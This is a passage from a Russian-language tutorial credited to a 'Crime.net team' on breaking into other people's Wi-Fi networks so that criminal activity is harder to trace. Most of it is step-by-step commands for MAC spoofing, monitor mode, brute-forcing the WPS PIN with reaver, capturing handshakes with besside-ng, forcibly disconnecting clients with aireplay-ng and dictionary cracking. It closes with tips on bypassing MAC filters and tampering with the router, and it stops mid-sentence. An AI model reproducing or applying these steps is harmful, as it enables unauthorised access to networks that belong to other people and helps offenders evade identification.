Взлом Wi-Fi
Crime.net teamДля чего это нужно?
Сколько бы цепочек прокси и vpn вы не использовали, вычислить конечного пользователя в теории остается возможным. Использование 3G модемов не всегда удобно, да и скорость оставляет желать лучшего. Взломанный вай-фай не гарантирует, что вас нельзя будет найти, не забываем, что wi-fi это радио сигнал, источник которого можно определить. Но как ни крути, это усложнит установление конечного пользователя, а при периодической смене точек и вовсе исключит такую возможность.
Есть и другие цели взлома кроме анонимизации, но использование останется за рамками этой статьи.
С чего начать?
1) Для начала следует приобрести Wi-Fi адаптер. Особой популярность у вардрайверов пользуется ALFA AWUS036H. Его можно приобрести на ebay, либо в местных магазинах (остерегайтесь подделок).
2) Под виндой ничего ломать естественно не будем.
Качаем дистрибутив BT5 вот тут: http://www.backtrack-linux.org/downloads/
Выбор падает на него, т.к. в нем сразу есть весь необходимый софт.
Прожигаем образ на болванку/флешку - кому что больше нравится. Это будет обычный live-cd
Загружаемся
Загрузились? Нет? Пишем startx и ждем прогрузки рабочего стола.
Открываем консоль (terminal)
airmon-ng - выводит на экран интерфейсы и соответствующие им чипсеты (вышеупомянутый адаптер использует чипсет Realtek RTL8187L)
В данном примере это будет wlan0
ifconfig - видим устройства и мак адрес, который не помешало бы сменить, сделать это проще простого.
ifconfig wlan0 down - выключаем
macchanger -r wlan0 - ключ -r генерирует рандомный мак адрес, если хотите задать свой, используется ключ -m
ifconfig wlan0 up - включаем
airmon-ng start wlan0 - переводим адаптер в режим монитора, это обязательно. Консоль покажет, что монитор запущен на интерфейсе mon0
Подготовительная часть закончена, теперь ближе к делу.
airodump-ng mon0 - начинаем сканирование доступных точек. Когда набралось достаточно - жмем ctrl+c
Они будут отличаться по типу шифрования:
OPN - открытые точки.
WEP - легко поддающиеся взлому.
WPA/WPA2 - самые распространенные, с некоторыми заморочками.
Начнем с интересного WPA/WPA2 c поддержкой WPS
Для начала рассмотрим взлом точек с WPS, метод заключается в подборе пина, из 8 символов 4 передаются в открытом виде и время затрачиваемое на подбор комбинации 4 цифр не критично.
Как определить, поддерживает ли точка wps?
wash -i mon0 - сразу скажу, эта утилита работает иногда криво и выдает не всё, либо лишнее.
Просканировали, нашли, завершаем (ctrl+c)
Далее будем использовать reaver
reaver -i mon0 -b МАК:ТОЧКИ -c КАНАЛ -vv - Мак это bssid. Номер канала указывать не обязательно, запустили, следим за происходящим и если все хорошо через некоторое время получите заветный пароль от точки.
Хендшейки и брут
Не буду грузить теорией, для взлома wpa/wpa2 точки, необходимо перехватить хендшейк, то есть нужно чтобы реальный пользователь успешно соединился с точкой, обменявшись ключами. Затем все это дело предстоит расшифровать, брутом. В нашем случае по словарю.
Ближе к делу, если нам нужна любая точка, то мы увеличим шансы на успех и уменьшим кол-во телодвижений:
besside-ng mon0 - запустили и ушли, эта софтина будет ловить хендшейки от всего, от чего можно, сама отключать клиента для получения заветных пакетов и сама проводить атаку на сети с WEP шифрованием, заботливо записав полученные результаты в файл besside.log в home директории. Там же будет файл wep.cap, который мы заботливо скопируем на флешку.
Сети с пойманными хендшейками будут обозначаться и когда наловите всё что нужно - жмите ctrl+c чтобы остановить процесс.
Если нужна конкретная точка, будем сидеть и искать
airodump-ng --bssid МАК -w hui mon0 - включаем запись в файл hui.cap
aireplay-ng --deauth 5 -a мак:точки -c мак:клиента wlan1 - долбим клиента, чтобы отключить его от точки.
Но это скорее для энтузиастов, со всем этим отлично справляется besside-ng.
Идем в винду, качаем Elcomsoft Wireless Security Auditor. Качаем словари, вспоминаем что за файл скинули на флешку и брутим.
Успех зависит от видеокарты, процессора и качества словарей.
Что делать если...
Поломали точку, но не можете соединиться? Или reaver отказывается соединяться с точкой?
Возможно стоит мак фильтр, ловите маки юзеров айродампом и подменяйте свой. Для смены мака адаптера через винду используйте программу macchange, софта под это дело достаточно, выбирайте что по душе. Но стоит помнить, что в одной сети не может быть двух пользователей с одним маком, это затруднит использование точки. Есть вероятность, что пароль на роутере такой же как на точке и ночью вы впишете в исключения свой мак